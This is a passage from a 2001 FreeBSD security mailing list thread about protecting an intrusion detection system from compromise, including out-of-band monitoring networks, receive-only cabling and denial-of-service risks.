something like LAT. Most modern day "Haxors" have never even heard of it. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 20:18:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7F30837B422 for ; Sat, 7 Apr 2001 20:18:19 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (4113 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 7 Apr 2001 22:17:03 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sat, 7 Apr 2001 22:16:52 -0500 (CDT) From: James Wyatt To: John Howie Cc: "Jacques A. Vidrine" , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question In-Reply-To: <058701c0bfad$265e8530$0101a8c0@development.local> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you have a large network to protect, maintaining a separate monitoring network for out-of-band control (of the main network which is subject to attack) can be pretty costly. I've seen VLANs suggested for large outfits, but that can be attacked at the switch level. You can use voice channels and PPP over serial, but filter the heck out of it and don't set a default route. At some point you will have to network to your IDS box if you want much functionality from it. If you simply have the box set to log out the serial port, it can be easily overrun (DoSed) if you have a good net connection. If you do enough, the easiest attack is to plant a contractor on your staff and have them work from the inside out anyway... - Jy@ On Sat, 7 Apr 2001, John Howie wrote: > I didn't see anyone state the obvious: have a separate monitoring network > that is not attached to your production (i.e. behind the interior DMZ > firewall) network. If the IDS box is compromised then it could be used to > launch attacks against other connected networks. By having it on a separate > monitoring network you prevent this scenario. > > In practice a machine with no IP address that just receives packets is not > likely to be vulnerable. Crist's scenario is not a probable one (as he, > himself, acknowledges). However, you might find yourself in a situation > where a DoS is created against the IDS itself which means that it won't > recognise the activity it was deployed to catch. > > john... > > > ----- Original Message ----- > From: "Jacques A. Vidrine" > To: "Crist Clark" > Cc: ; > Sent: Saturday, April 07, 2001 2:25 PM > Subject: Re: Theory Question > > > > On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote: > > > A possible scenario: Your IDS is listening to the unprotected link to > > > the Internet and chugging away, crunching the data passing by looking > > > for attack signatures. Hiding somewhere in the bowels of this large > > > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r > > > sends a crafted series of packets past the box which trip the buffer > > > overflow and execute arbitrary code of his choosing on the box. Game > > > over. His code could attach an IP stack to the external interface > > > (just run ifconfig), it could open a tunnel through the backside of > > > the IDS and back out of the front[1] of your network, or if EvulHax0r > > > is really 33l33t, he could set up a covert channel on the external > > > interface that does not use the kernel stack. > > > > This is why you physically cut the TX wires to the network. That buffer > > overflow can still be successful, and the machine can still be > > comprimised, but it cannot be used to make further attacks. The types > > of comprimises are also limited, since the attacker must work blindly. > > > > Of course, the problem is then how do you get useful information out of > > your IDS? > > > > Cheers, > > -- > > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message